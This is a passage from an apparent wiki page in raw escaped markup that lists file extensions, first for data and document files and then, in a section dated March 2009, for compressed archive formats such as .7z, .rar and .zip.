.abp&lt;br /&gt;
.aby&lt;br /&gt;
.aca&lt;br /&gt;
.acc&lt;br /&gt;
.accdb&lt;br /&gt;
.acf&lt;br /&gt;
.acg&lt;br /&gt;
.ade&lt;br /&gt;
.adp&lt;br /&gt;
.adt&lt;br /&gt;
.adx&lt;br /&gt;
.aft&lt;br /&gt;
.agd&lt;br /&gt;
.aifb&lt;br /&gt;
.alc&lt;br /&gt;
.ald&lt;br /&gt;
.ali&lt;br /&gt;
.amb&lt;br /&gt;
.amsorm&lt;br /&gt;
.an1&lt;br /&gt;
.anme&lt;br /&gt;
.apr&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ask&lt;br /&gt;
.asm&lt;br /&gt;
.ast&lt;br /&gt;
.at5&lt;br /&gt;
.att&lt;br /&gt;
.aw&lt;br /&gt;
.awg&lt;br /&gt;
.azw&lt;br /&gt;
.bafl&lt;br /&gt;
.bci&lt;br /&gt;
.bcm&lt;br /&gt;
.bdf&lt;br /&gt;
.bdic&lt;br /&gt;
.bfx&lt;br /&gt;
.bgl&lt;br /&gt;
.bgt&lt;br /&gt;
.bin&lt;br /&gt;
.bjo&lt;br /&gt;
.bk&lt;br /&gt;
.bkk&lt;br /&gt;
.blb&lt;br /&gt;
.bld&lt;br /&gt;
.blg&lt;br /&gt;
.bok&lt;br /&gt;
.box&lt;br /&gt;
.brd&lt;br /&gt;
.brw&lt;br /&gt;
.btf&lt;br /&gt;
.btif&lt;br /&gt;
.btm&lt;br /&gt;
.btr&lt;br /&gt;
.cap&lt;br /&gt;
.cat&lt;br /&gt;
.cbg&lt;br /&gt;
.cch&lt;br /&gt;
.ccr&lt;br /&gt;
.cct&lt;br /&gt;
.cdb&lt;br /&gt;
.cdd&lt;br /&gt;
.cdf&lt;br /&gt;
.cdp&lt;br /&gt;
.cdr&lt;br /&gt;
.cdx&lt;br /&gt;
.cel&lt;br /&gt;
.celtx&lt;br /&gt;
.chg&lt;br /&gt;
.chk&lt;br /&gt;
.chn&lt;br /&gt;
.ckd&lt;br /&gt;
.ckt&lt;br /&gt;
.cl2&lt;br /&gt;
.cl4&lt;br /&gt;
.clb&lt;br /&gt;
.clix&lt;br /&gt;
.clm&lt;br /&gt;
.clp&lt;br /&gt;
.cmbl&lt;br /&gt;
.cna&lt;br /&gt;
.contact&lt;br /&gt;
.cpi&lt;br /&gt;
.cpmz&lt;br /&gt;
.crd&lt;br /&gt;
.crtx&lt;br /&gt;
.csa&lt;br /&gt;
.csv&lt;br /&gt;
.ctf&lt;br /&gt;
.ctt&lt;br /&gt;
.cursorfx&lt;br /&gt;
.curxptheme&lt;br /&gt;
.cvd&lt;br /&gt;
.cvn&lt;br /&gt;
.cwk&lt;br /&gt;
.cws&lt;br /&gt;
.cwz&lt;br /&gt;
.cxt&lt;br /&gt;
.cyo&lt;br /&gt;
.cys&lt;br /&gt;
.daf&lt;br /&gt;
.dal&lt;br /&gt;
.dam&lt;br /&gt;
.das&lt;br /&gt;
.dat&lt;br /&gt;
.data&lt;br /&gt;
.db&lt;br /&gt;
.db2&lt;br /&gt;
.db3&lt;br /&gt;
.dbc&lt;br /&gt;
.dbd&lt;br /&gt;
.dbf&lt;br /&gt;
.dbx&lt;br /&gt;
.dcf&lt;br /&gt;
.dcl&lt;br /&gt;
.dcm&lt;br /&gt;
.dcmd&lt;br /&gt;
.ddc&lt;br /&gt;
.ddcx&lt;br /&gt;
.ddt&lt;br /&gt;
.dem&lt;br /&gt;
.des&lt;br /&gt;
.dex&lt;br /&gt;
.dfm&lt;br /&gt;
.dfproj&lt;br /&gt;
.dft&lt;br /&gt;
.dgb&lt;br /&gt;
.dif&lt;br /&gt;
.dii&lt;br /&gt;
.dlg&lt;br /&gt;
.dm2&lt;br /&gt;
.dmo&lt;br /&gt;
.dmsk&lt;br /&gt;
.dnc&lt;br /&gt;
.dockzip&lt;br /&gt;
.dp1&lt;br /&gt;
.dpn&lt;br /&gt;
.dpx&lt;br /&gt;
.drl&lt;br /&gt;
.dsb&lt;br /&gt;
.dsd&lt;br /&gt;
.dsk&lt;br /&gt;
.dsy&lt;br /&gt;
.dsz&lt;br /&gt;
.dt0&lt;br /&gt;
.dt1&lt;br /&gt;
.dt2&lt;br /&gt;
.dta&lt;br /&gt;
.dtr&lt;br /&gt;
.dvdproj&lt;br /&gt;
.dvo&lt;br /&gt;
.dwi&lt;br /&gt;
.e00&lt;br /&gt;
.eap&lt;br /&gt;
.ebuild&lt;br /&gt;
.ec0&lt;br /&gt;
.eco&lt;br /&gt;
.ecx&lt;br /&gt;
.edb&lt;br /&gt;
.edf&lt;br /&gt;
.eep&lt;br /&gt;
.efx&lt;br /&gt;
.egp&lt;br /&gt;
.emb&lt;br /&gt;
.emd&lt;br /&gt;
.emlxpart&lt;br /&gt;
.enc&lt;br /&gt;
.enw&lt;br /&gt;
.epp&lt;br /&gt;
.epub&lt;br /&gt;
.epw&lt;br /&gt;
.er1&lt;br /&gt;
.esp&lt;br /&gt;
.ess&lt;br /&gt;
.est&lt;br /&gt;
.esx&lt;br /&gt;
.et&lt;br /&gt;
.eta&lt;br /&gt;
.etd&lt;br /&gt;
.etl&lt;br /&gt;
.ev&lt;br /&gt;
.ev3&lt;br /&gt;
.evt&lt;br /&gt;
.evy&lt;br /&gt;
.exif&lt;br /&gt;
.exp&lt;br /&gt;
.exx&lt;br /&gt;
.fa&lt;br /&gt;
.fasta&lt;br /&gt;
.fbl&lt;br /&gt;
.fcd&lt;br /&gt;
.fcs&lt;br /&gt;
.fdb&lt;br /&gt;
.ffd&lt;br /&gt;
.ffwp&lt;br /&gt;
.fhc&lt;br /&gt;
.fid&lt;br /&gt;
.fil&lt;br /&gt;
.flame&lt;br /&gt;
.fll&lt;br /&gt;
.flo&lt;br /&gt;
.flp&lt;br /&gt;
.flt&lt;br /&gt;
.fm&lt;br /&gt;
.fm5&lt;br /&gt;
.fmp&lt;br /&gt;
.fo&lt;br /&gt;
.fob&lt;br /&gt;
.fol&lt;br /&gt;
.fop&lt;br /&gt;
.fox&lt;br /&gt;
.fp&lt;br /&gt;
.fp3&lt;br /&gt;
.fp4&lt;br /&gt;
.fp5&lt;br /&gt;
.fp7&lt;br /&gt;
.frl&lt;br /&gt;
.frm&lt;br /&gt;
.fro&lt;br /&gt;
.frx&lt;br /&gt;
.fsb&lt;br /&gt;
.fsc&lt;br /&gt;
.ftm&lt;br /&gt;
.ftw&lt;br /&gt;
.gan&lt;br /&gt;
.gbr&lt;br /&gt;
.gc&lt;br /&gt;
.gcx&lt;br /&gt;
.gdb&lt;br /&gt;
.ged&lt;br /&gt;
.gedcom&lt;br /&gt;
.gen&lt;br /&gt;
.ggb&lt;br /&gt;
.gml&lt;br /&gt;
.gms&lt;br /&gt;
.gno&lt;br /&gt;
.gnp&lt;br /&gt;
.gp3&lt;br /&gt;
.gpi&lt;br /&gt;
.gps&lt;br /&gt;
.gpx&lt;br /&gt;
.gra&lt;br /&gt;
.grade&lt;br /&gt;
.grf&lt;br /&gt;
.grib&lt;br /&gt;
.grk&lt;br /&gt;
.grr&lt;br /&gt;
.grv&lt;br /&gt;
.gs&lt;br /&gt;
.gst&lt;br /&gt;
.gtp&lt;br /&gt;
.gwk&lt;br /&gt;
.gxl&lt;br /&gt;
.hcc&lt;br /&gt;
.hce&lt;br /&gt;
.hci&lt;br /&gt;
.hcp&lt;br /&gt;
.hcr&lt;br /&gt;
.hcu&lt;br /&gt;
.hda&lt;br /&gt;
.hdb&lt;br /&gt;
.hdf&lt;br /&gt;
.hdi&lt;br /&gt;
.hdl&lt;br /&gt;
.hif&lt;br /&gt;
.hl&lt;br /&gt;
.hml&lt;br /&gt;
.hmt&lt;br /&gt;
.hs2&lt;br /&gt;
.hsk&lt;br /&gt;
.hst&lt;br /&gt;
.htg&lt;br /&gt;
.huh&lt;br /&gt;
.hyv&lt;br /&gt;
.i5z&lt;br /&gt;
.ib&lt;br /&gt;
.ics&lt;br /&gt;
.id2&lt;br /&gt;
.idx&lt;br /&gt;
.igc&lt;br /&gt;
.ihx&lt;br /&gt;
.ii&lt;br /&gt;
.iif&lt;br /&gt;
.img&lt;br /&gt;
.imt&lt;br /&gt;
.ink&lt;br /&gt;
.inp&lt;br /&gt;
.ins&lt;br /&gt;
.ip&lt;br /&gt;
.irock&lt;br /&gt;
.irr&lt;br /&gt;
.irx&lt;br /&gt;
.isf&lt;br /&gt;
.itdb&lt;br /&gt;
.itl&lt;br /&gt;
.itm&lt;br /&gt;
.itn&lt;br /&gt;
.itw&lt;br /&gt;
.itx&lt;br /&gt;
.ivt&lt;br /&gt;
.iw&lt;br /&gt;
.ixb&lt;br /&gt;
.jasper&lt;br /&gt;
.jdb&lt;br /&gt;
.jef&lt;br /&gt;
.jmp&lt;br /&gt;
.jnt&lt;br /&gt;
.job&lt;br /&gt;
.joboptions&lt;br /&gt;
.joined&lt;br /&gt;
.jph&lt;br /&gt;
.jrprint&lt;br /&gt;
.jrxml&lt;br /&gt;
.jude&lt;br /&gt;
.kap&lt;br /&gt;
.kdb&lt;br /&gt;
.kid&lt;br /&gt;
.kismac&lt;br /&gt;
.kmz&lt;br /&gt;
.kpf&lt;br /&gt;
.kpp&lt;br /&gt;
.kpr&lt;br /&gt;
.kpx&lt;br /&gt;
.kpz&lt;br /&gt;
.l&lt;br /&gt;
.l6t&lt;br /&gt;
.laccdb&lt;br /&gt;
.lbl&lt;br /&gt;
.lbx&lt;br /&gt;
.lcd&lt;br /&gt;
.lcf&lt;br /&gt;
.lcm&lt;br /&gt;
.ldif&lt;br /&gt;
.lex&lt;br /&gt;
.lgc&lt;br /&gt;
.lgf&lt;br /&gt;
.lgh&lt;br /&gt;
.lgi&lt;br /&gt;
.lgl&lt;br /&gt;
.lib&lt;br /&gt;
.lif&lt;br /&gt;
.livereg&lt;br /&gt;
.liveupdate&lt;br /&gt;
.lix&lt;br /&gt;
.llb&lt;br /&gt;
.lms&lt;br /&gt;
.lmx&lt;br /&gt;
.lnt&lt;br /&gt;
.loc&lt;br /&gt;
.lp7&lt;br /&gt;
.lrf&lt;br /&gt;
.lrs&lt;br /&gt;
.lrx&lt;br /&gt;
.lsf&lt;br /&gt;
.lsl&lt;br /&gt;
.lsp&lt;br /&gt;
.lsr&lt;br /&gt;
.lst&lt;br /&gt;
.lsu&lt;br /&gt;
.lvm&lt;br /&gt;
.lw4&lt;br /&gt;
.ly&lt;br /&gt;
.m&lt;br /&gt;
.mag&lt;br /&gt;
.mai&lt;br /&gt;
.map&lt;br /&gt;
.masseffectprofile&lt;br /&gt;
.mat&lt;br /&gt;
.mbb&lt;br /&gt;
.mbf&lt;br /&gt;
.mbg&lt;br /&gt;
.mbl&lt;br /&gt;
.mbp&lt;br /&gt;
.mbx&lt;br /&gt;
.mc1&lt;br /&gt;
.mc9&lt;br /&gt;
.mcd&lt;br /&gt;
.md&lt;br /&gt;
.mdb&lt;br /&gt;
.mdc&lt;br /&gt;
.mdf&lt;br /&gt;
.mdl&lt;br /&gt;
.mdm&lt;br /&gt;
.mdn&lt;br /&gt;
.mdt&lt;br /&gt;
.mdx&lt;br /&gt;
.mdz&lt;br /&gt;
.mem&lt;br /&gt;
.menc&lt;br /&gt;
.met&lt;br /&gt;
.mex&lt;br /&gt;
.mfo&lt;br /&gt;
.mfp&lt;br /&gt;
.mgc&lt;br /&gt;
.mls&lt;br /&gt;
.mm&lt;br /&gt;
.mmap&lt;br /&gt;
.mmc&lt;br /&gt;
.mmf&lt;br /&gt;
.mmp&lt;br /&gt;
.mnc&lt;br /&gt;
.mng&lt;br /&gt;
.mnk&lt;br /&gt;
.mno&lt;br /&gt;
.mny&lt;br /&gt;
.mobi&lt;br /&gt;
.moho&lt;br /&gt;
.mosaic&lt;br /&gt;
.mox&lt;br /&gt;
.mpd&lt;br /&gt;
.mpj&lt;br /&gt;
.mpp&lt;br /&gt;
.mpt&lt;br /&gt;
.mpx&lt;br /&gt;
.mpz&lt;br /&gt;
.mq4&lt;br /&gt;
.ms10&lt;br /&gt;
.mth&lt;br /&gt;
.mtw&lt;br /&gt;
.mud&lt;br /&gt;
.muf&lt;br /&gt;
.mw&lt;br /&gt;
.mwf&lt;br /&gt;
.mws&lt;br /&gt;
.mwx&lt;br /&gt;
.mxd&lt;br /&gt;
.myd&lt;br /&gt;
.myi&lt;br /&gt;
.nb&lt;br /&gt;
.nc&lt;br /&gt;
.ndf&lt;br /&gt;
.ndk&lt;br /&gt;
.ndx&lt;br /&gt;
.net&lt;br /&gt;
.neta&lt;br /&gt;
.nfo&lt;br /&gt;
.nitf&lt;br /&gt;
.nmind&lt;br /&gt;
.not&lt;br /&gt;
.notebook&lt;br /&gt;
.np&lt;br /&gt;
.npl&lt;br /&gt;
.npt&lt;br /&gt;
.nrl&lt;br /&gt;
.ns2&lt;br /&gt;
.ns3&lt;br /&gt;
.ns4&lt;br /&gt;
.nsf&lt;br /&gt;
.ntx&lt;br /&gt;
.numbers&lt;br /&gt;
.nvl&lt;br /&gt;
.nyf&lt;br /&gt;
.oab&lt;br /&gt;
.obj&lt;br /&gt;
.odb&lt;br /&gt;
.odf&lt;br /&gt;
.odp&lt;br /&gt;
.ods&lt;br /&gt;
.odx&lt;br /&gt;
.oeaccount&lt;br /&gt;
.ofc&lt;br /&gt;
.ofm&lt;br /&gt;
.oft&lt;br /&gt;
.ofx&lt;br /&gt;
.omcs&lt;br /&gt;
.omp&lt;br /&gt;
.ond&lt;br /&gt;
.one&lt;br /&gt;
.oo3&lt;br /&gt;
.opf&lt;br /&gt;
.opx&lt;br /&gt;
.or2&lt;br /&gt;
.or3&lt;br /&gt;
.or4&lt;br /&gt;
.or5&lt;br /&gt;
.or6&lt;br /&gt;
.org&lt;br /&gt;
.orx&lt;br /&gt;
.otf&lt;br /&gt;
.otl&lt;br /&gt;
.otln&lt;br /&gt;
.ots&lt;br /&gt;
.out&lt;br /&gt;
.ov2&lt;br /&gt;
.ova&lt;br /&gt;
.ovf&lt;br /&gt;
.p96&lt;br /&gt;
.p97&lt;br /&gt;
.pab&lt;br /&gt;
.paf&lt;br /&gt;
.pan&lt;br /&gt;
.pbd&lt;br /&gt;
.pc&lt;br /&gt;
.pcap&lt;br /&gt;
.pcb&lt;br /&gt;
.pcr&lt;br /&gt;
.pd4&lt;br /&gt;
.pd5&lt;br /&gt;
.pdas&lt;br /&gt;
.pdb&lt;br /&gt;
.pdd&lt;br /&gt;
.pdm&lt;br /&gt;
.pds&lt;br /&gt;
.pdx&lt;br /&gt;
.peb&lt;br /&gt;
.pec&lt;br /&gt;
.pep&lt;br /&gt;
.pex&lt;br /&gt;
.pfc&lt;br /&gt;
.pfl&lt;br /&gt;
.phb&lt;br /&gt;
.phm&lt;br /&gt;
.pi&lt;br /&gt;
.pis&lt;br /&gt;
.pjx&lt;br /&gt;
.pka&lt;br /&gt;
.pkb&lt;br /&gt;
.pkh&lt;br /&gt;
.pks&lt;br /&gt;
.pkt&lt;br /&gt;
.pln&lt;br /&gt;
.plw&lt;br /&gt;
.pmo&lt;br /&gt;
.pmr&lt;br /&gt;
.pnproj&lt;br /&gt;
.pnpt&lt;br /&gt;
.pns&lt;br /&gt;
.pnt&lt;br /&gt;
.pod&lt;br /&gt;
.poi&lt;br /&gt;
.pos&lt;br /&gt;
.postal&lt;br /&gt;
.pot&lt;br /&gt;
.potm&lt;br /&gt;
.potx&lt;br /&gt;
.pp2&lt;br /&gt;
.ppf&lt;br /&gt;
.pps&lt;br /&gt;
.ppsx&lt;br /&gt;
.ppt&lt;br /&gt;
.pptm&lt;br /&gt;
.pptx&lt;br /&gt;
.prc&lt;br /&gt;
.pre&lt;br /&gt;
.prf&lt;br /&gt;
.prj&lt;br /&gt;
.prm&lt;br /&gt;
.prs&lt;br /&gt;
.psa&lt;br /&gt;
.psf&lt;br /&gt;
.psm&lt;br /&gt;
.pst&lt;br /&gt;
.ptb&lt;br /&gt;
.ptf&lt;br /&gt;
.ptk&lt;br /&gt;
.ptm&lt;br /&gt;
.ptn&lt;br /&gt;
.ptt&lt;br /&gt;
.ptz&lt;br /&gt;
.pvl&lt;br /&gt;
.pwd&lt;br /&gt;
.pxj&lt;br /&gt;
.pxl&lt;br /&gt;
.q07&lt;br /&gt;
.q08&lt;br /&gt;
.q09&lt;br /&gt;
.q3d&lt;br /&gt;
.qbw&lt;br /&gt;
.qdat&lt;br /&gt;
.qdf&lt;br /&gt;
.qdfm&lt;br /&gt;
.qel&lt;br /&gt;
.qfx&lt;br /&gt;
.qif&lt;br /&gt;
.qpb&lt;br /&gt;
.qpf&lt;br /&gt;
.qph&lt;br /&gt;
.qpm&lt;br /&gt;
.qpw&lt;br /&gt;
.qrp&lt;br /&gt;
.qsd&lt;br /&gt;
.ral&lt;br /&gt;
.rbt&lt;br /&gt;
.rcd&lt;br /&gt;
.rcg&lt;br /&gt;
.rdb&lt;br /&gt;
.rdf&lt;br /&gt;
.rdx&lt;br /&gt;
.ref&lt;br /&gt;
.ret&lt;br /&gt;
.rf1&lt;br /&gt;
.rfa&lt;br /&gt;
.rfo&lt;br /&gt;
.rge&lt;br /&gt;
.rgn&lt;br /&gt;
.rgo&lt;br /&gt;
.rmuf&lt;br /&gt;
.rnq&lt;br /&gt;
.rod&lt;br /&gt;
.rog&lt;br /&gt;
.roi&lt;br /&gt;
.rou&lt;br /&gt;
.rpp&lt;br /&gt;
.rpt&lt;br /&gt;
.rrt&lt;br /&gt;
.rsc&lt;br /&gt;
.rsd&lt;br /&gt;
.rsw&lt;br /&gt;
.rte&lt;br /&gt;
.rvt&lt;br /&gt;
.rwg&lt;br /&gt;
.rzb&lt;br /&gt;
.s85&lt;br /&gt;
.saf&lt;br /&gt;
.sam07&lt;br /&gt;
.sar&lt;br /&gt;
.sav&lt;br /&gt;
.sbd&lt;br /&gt;
.sbf&lt;br /&gt;
.sbq&lt;br /&gt;
.sbt&lt;br /&gt;
.sca&lt;br /&gt;
.scf&lt;br /&gt;
.sch&lt;br /&gt;
.sdb&lt;br /&gt;
.sdc&lt;br /&gt;
.sdf&lt;br /&gt;
.sdp&lt;br /&gt;
.sdq&lt;br /&gt;
.sds&lt;br /&gt;
.sen&lt;br /&gt;
.seo&lt;br /&gt;
.seq&lt;br /&gt;
.ser&lt;br /&gt;
.sgml&lt;br /&gt;
.sgn&lt;br /&gt;
.shp&lt;br /&gt;
.shs&lt;br /&gt;
.shx&lt;br /&gt;
.skc&lt;br /&gt;
.skv&lt;br /&gt;
.skx&lt;br /&gt;
.sle&lt;br /&gt;
.slk&lt;br /&gt;
.slp&lt;br /&gt;
.snapfireshow&lt;br /&gt;
.sonic&lt;br /&gt;
.soundpack&lt;br /&gt;
.spo&lt;br /&gt;
.sps&lt;br /&gt;
.spub&lt;br /&gt;
.spv&lt;br /&gt;
.sq&lt;br /&gt;
.sqd&lt;br /&gt;
.sql&lt;br /&gt;
.sqlite&lt;br /&gt;
.sqr&lt;br /&gt;
.sta&lt;br /&gt;
.stc&lt;br /&gt;
.stf&lt;br /&gt;
.stk&lt;br /&gt;
.stl&lt;br /&gt;
.stm&lt;br /&gt;
.stp&lt;br /&gt;
.str&lt;br /&gt;
.stt&lt;br /&gt;
.stw&lt;br /&gt;
.styk&lt;br /&gt;
.stykz&lt;br /&gt;
.swk&lt;br /&gt;
.sxc&lt;br /&gt;
.sxi&lt;br /&gt;
.sy3&lt;br /&gt;
.t01&lt;br /&gt;
.t02&lt;br /&gt;
.t03&lt;br /&gt;
.t04&lt;br /&gt;
.t05&lt;br /&gt;
.t06&lt;br /&gt;
.t07&lt;br /&gt;
.t08&lt;br /&gt;
.t09&lt;br /&gt;
.t2&lt;br /&gt;
.t3001&lt;br /&gt;
.tax2008&lt;br /&gt;
.tax2009&lt;br /&gt;
.tb&lt;br /&gt;
.tbk&lt;br /&gt;
.tbl&lt;br /&gt;
.tcc&lt;br /&gt;
.tcx&lt;br /&gt;
.tda&lt;br /&gt;
.tdl&lt;br /&gt;
.tdm&lt;br /&gt;
.tdt&lt;br /&gt;
.te&lt;br /&gt;
.te3&lt;br /&gt;
.teacher&lt;br /&gt;
.tef&lt;br /&gt;
.tet&lt;br /&gt;
.tfa&lt;br /&gt;
.tfd&lt;br /&gt;
.tfrd&lt;br /&gt;
.tjp&lt;br /&gt;
.tk3&lt;br /&gt;
.tkfl&lt;br /&gt;
.tmw&lt;br /&gt;
.tol&lt;br /&gt;
.topc&lt;br /&gt;
.tpb&lt;br /&gt;
.tps&lt;br /&gt;
.tr3&lt;br /&gt;
.tra&lt;br /&gt;
.trd&lt;br /&gt;
.trk&lt;br /&gt;
.trs&lt;br /&gt;
.trx&lt;br /&gt;
.tst&lt;br /&gt;
.tsv&lt;br /&gt;
.ttk&lt;br /&gt;
.txa&lt;br /&gt;
.txd&lt;br /&gt;
.txf&lt;br /&gt;
.uccapilog&lt;br /&gt;
.ud&lt;br /&gt;
.udb&lt;br /&gt;
.udeb&lt;br /&gt;
.uds&lt;br /&gt;
.ulf&lt;br /&gt;
.ulz&lt;br /&gt;
.update&lt;br /&gt;
.upoi&lt;br /&gt;
.usr&lt;br /&gt;
.uvf&lt;br /&gt;
.uwl&lt;br /&gt;
.val&lt;br /&gt;
.vbpf1&lt;br /&gt;
.vcd&lt;br /&gt;
.vce&lt;br /&gt;
.vcf&lt;br /&gt;
.vcs&lt;br /&gt;
.vdb&lt;br /&gt;
.vdx&lt;br /&gt;
.vfs&lt;br /&gt;
.vi&lt;br /&gt;
.vip&lt;br /&gt;
.vle&lt;br /&gt;
.vlg&lt;br /&gt;
.vmt&lt;br /&gt;
.voi&lt;br /&gt;
.vok&lt;br /&gt;
.vrd&lt;br /&gt;
.vscontent&lt;br /&gt;
.vsx&lt;br /&gt;
.vtx&lt;br /&gt;
.vxml&lt;br /&gt;
.w02&lt;br /&gt;
.wab&lt;br /&gt;
.wb1&lt;br /&gt;
.wb2&lt;br /&gt;
.wb3&lt;br /&gt;
.wdb&lt;br /&gt;
.wdq&lt;br /&gt;
.wea&lt;br /&gt;
.wfd&lt;br /&gt;
.wfm&lt;br /&gt;
.wgp&lt;br /&gt;
.wgt&lt;br /&gt;
.windowslivecontact&lt;br /&gt;
.wjr&lt;br /&gt;
.wk1&lt;br /&gt;
.wk2&lt;br /&gt;
.wk3&lt;br /&gt;
.wk4&lt;br /&gt;
.wk5&lt;br /&gt;
.wke&lt;br /&gt;
.wki&lt;br /&gt;
.wks&lt;br /&gt;
.wku&lt;br /&gt;
.wlmp&lt;br /&gt;
.wmdb&lt;br /&gt;
.wor&lt;br /&gt;
.wpc&lt;br /&gt;
.wpf&lt;br /&gt;
.wpo&lt;br /&gt;
.wq1&lt;br /&gt;
.wq2&lt;br /&gt;
.wtb&lt;br /&gt;
.wtr&lt;br /&gt;
.xbk&lt;br /&gt;
.xdb&lt;br /&gt;
.xdp&lt;br /&gt;
.xds&lt;br /&gt;
.xef&lt;br /&gt;
.xem&lt;br /&gt;
.xfd&lt;br /&gt;
.xfo&lt;br /&gt;
.xft&lt;br /&gt;
.xl&lt;br /&gt;
.xlc&lt;br /&gt;
.xlgc&lt;br /&gt;
.xlr&lt;br /&gt;
.xls&lt;br /&gt;
.xlsb&lt;br /&gt;
.xlsm&lt;br /&gt;
.xlsx&lt;br /&gt;
.xlt&lt;br /&gt;
.xltm&lt;br /&gt;
.xltx&lt;br /&gt;
.xlw&lt;br /&gt;
.xmcd&lt;br /&gt;
.xml&lt;br /&gt;
.xmlper&lt;br /&gt;
.xmpz&lt;br /&gt;
.xpg&lt;br /&gt;
.xpj&lt;br /&gt;
.xpm&lt;br /&gt;
.xpt&lt;br /&gt;
.xrp&lt;br /&gt;
.xsl&lt;br /&gt;
.xslt&lt;br /&gt;
.xsn&lt;br /&gt;
.xtm&lt;br /&gt;
.xtp&lt;br /&gt;
.xxd&lt;br /&gt;
.yam&lt;br /&gt;
.zap&lt;br /&gt;
.zdb&lt;br /&gt;
.zdc&lt;br /&gt;
.zix&lt;br /&gt;
.zmc&lt;br /&gt;
.zpl&lt;br /&gt;
.{pb&lt;br /&gt;
.~hm&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== (Compressed File Types - (Update: 16 March 2009 - Total Statements: 187) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;.0&lt;br /&gt;
.000&lt;br /&gt;
.7z&lt;br /&gt;
.a00&lt;br /&gt;
.a01&lt;br /&gt;
.a02&lt;br /&gt;
.ace&lt;br /&gt;
.ain&lt;br /&gt;
.alz&lt;br /&gt;
.apz&lt;br /&gt;
.ar&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ari&lt;br /&gt;
.arj&lt;br /&gt;
.ark&lt;br /&gt;
.axx&lt;br /&gt;
.b64&lt;br /&gt;
.ba&lt;br /&gt;
.bh&lt;br /&gt;
.boo&lt;br /&gt;
.bz&lt;br /&gt;
.bz2&lt;br /&gt;
.bzip&lt;br /&gt;
.bzip2&lt;br /&gt;
.c00&lt;br /&gt;
.c01&lt;br /&gt;
.c02&lt;br /&gt;
.car&lt;br /&gt;
.cb7&lt;br /&gt;
.cbr&lt;br /&gt;
.cbt&lt;br /&gt;
.cbz&lt;br /&gt;
.cp9&lt;br /&gt;
.cpgz&lt;br /&gt;
.cpt&lt;br /&gt;
.dar&lt;br /&gt;
.dd&lt;br /&gt;
.deb&lt;br /&gt;
.dgc&lt;br /&gt;
.dist&lt;br /&gt;
.ecs&lt;br /&gt;
.efw&lt;br /&gt;
.epi&lt;br /&gt;
.f&lt;br /&gt;
.fdp&lt;br /&gt;
.gca&lt;br /&gt;
.gz&lt;br /&gt;
.gzi&lt;br /&gt;
.gzip&lt;br /&gt;
.ha&lt;br /&gt;
.hbc&lt;br /&gt;
.hbc2&lt;br /&gt;
.hbe&lt;br /&gt;
.hki&lt;br /&gt;
.hki1&lt;br /&gt;
.hki2&lt;br /&gt;
.hki3&lt;br /&gt;
.hpk&lt;br /&gt;
.hyp&lt;br /&gt;
.ice&lt;br /&gt;
.ipg&lt;br /&gt;
.ipk&lt;br /&gt;
.ish&lt;br /&gt;
.j&lt;br /&gt;
.jar.pack&lt;br /&gt;
.jgz&lt;br /&gt;
.jic&lt;br /&gt;
.kgb&lt;br /&gt;
.lbr&lt;br /&gt;
.lemon&lt;br /&gt;
.lha&lt;br /&gt;
.lnx&lt;br /&gt;
.lqr&lt;br /&gt;
.lz&lt;br /&gt;
.lzh&lt;br /&gt;
.lzm&lt;br /&gt;
.lzma&lt;br /&gt;
.lzo&lt;br /&gt;
.lzx&lt;br /&gt;
.md&lt;br /&gt;
.mint&lt;br /&gt;
.mou&lt;br /&gt;
.mpkg&lt;br /&gt;
.mzp&lt;br /&gt;
.oar&lt;br /&gt;
.p7m&lt;br /&gt;
.pack.gz&lt;br /&gt;
.package&lt;br /&gt;
.pae&lt;br /&gt;
.pak&lt;br /&gt;
.paq6&lt;br /&gt;
.paq7&lt;br /&gt;
.paq8&lt;br /&gt;
.par&lt;br /&gt;
.par2&lt;br /&gt;
.pbi&lt;br /&gt;
.pcv&lt;br /&gt;
.pea&lt;br /&gt;
.pet&lt;br /&gt;
.pf&lt;br /&gt;
.pim&lt;br /&gt;
.pit&lt;br /&gt;
.piz&lt;br /&gt;
.pkg&lt;br /&gt;
.pup&lt;br /&gt;
.puz&lt;br /&gt;
.pwa&lt;br /&gt;
.qda&lt;br /&gt;
.r0&lt;br /&gt;
.r00&lt;br /&gt;
.r01&lt;br /&gt;
.r02&lt;br /&gt;
.r03&lt;br /&gt;
.r1&lt;br /&gt;
.r2&lt;br /&gt;
.r30&lt;br /&gt;
.rar&lt;br /&gt;
.rev&lt;br /&gt;
.rk&lt;br /&gt;
.rnc&lt;br /&gt;
.rp9&lt;br /&gt;
.rpm&lt;br /&gt;
.rte&lt;br /&gt;
.rz&lt;br /&gt;
.rzs&lt;br /&gt;
.s00&lt;br /&gt;
.s01&lt;br /&gt;
.s02&lt;br /&gt;
.s7z&lt;br /&gt;
.sar&lt;br /&gt;
.sdc&lt;br /&gt;
.sdn&lt;br /&gt;
.sea&lt;br /&gt;
.sen&lt;br /&gt;
.sfs&lt;br /&gt;
.sfx&lt;br /&gt;
.sh&lt;br /&gt;
.shar&lt;br /&gt;
.shk&lt;br /&gt;
.shr&lt;br /&gt;
.sit&lt;br /&gt;
.sitx&lt;br /&gt;
.spt&lt;br /&gt;
.sqx&lt;br /&gt;
.sqz&lt;br /&gt;
.tar&lt;br /&gt;
.tar.gz&lt;br /&gt;
.tar.xz&lt;br /&gt;
.taz&lt;br /&gt;
.tbz&lt;br /&gt;
.tbz2&lt;br /&gt;
.tg&lt;br /&gt;
.tgz&lt;br /&gt;
.tlz&lt;br /&gt;
.tlzma&lt;br /&gt;
.txz&lt;br /&gt;
.tz&lt;br /&gt;
.uc2&lt;br /&gt;
.uha&lt;br /&gt;
.vem&lt;br /&gt;
.vsi&lt;br /&gt;
.wad&lt;br /&gt;
.war&lt;br /&gt;
.wot&lt;br /&gt;
.xef&lt;br /&gt;
.xez&lt;br /&gt;
.xmcdz&lt;br /&gt;
.xpi&lt;br /&gt;
.xx&lt;br /&gt;
.xz&lt;br /&gt;
.y&lt;br /&gt;
.yz&lt;br /&gt;
.z&lt;br /&gt;
.z01&lt;br /&gt;
.z02&lt;br /&gt;
.z03&lt;br /&gt;
.z04&lt;br /&gt;
.zap&lt;br /&gt;
.zfsendtotarget&lt;br /&gt;
.zip&lt;br /&gt;
.zipx&lt;br /&gt;
.zix&lt;br /&gt;
.zoo&lt;br /&gt;
.zpi&lt;br /&gt;
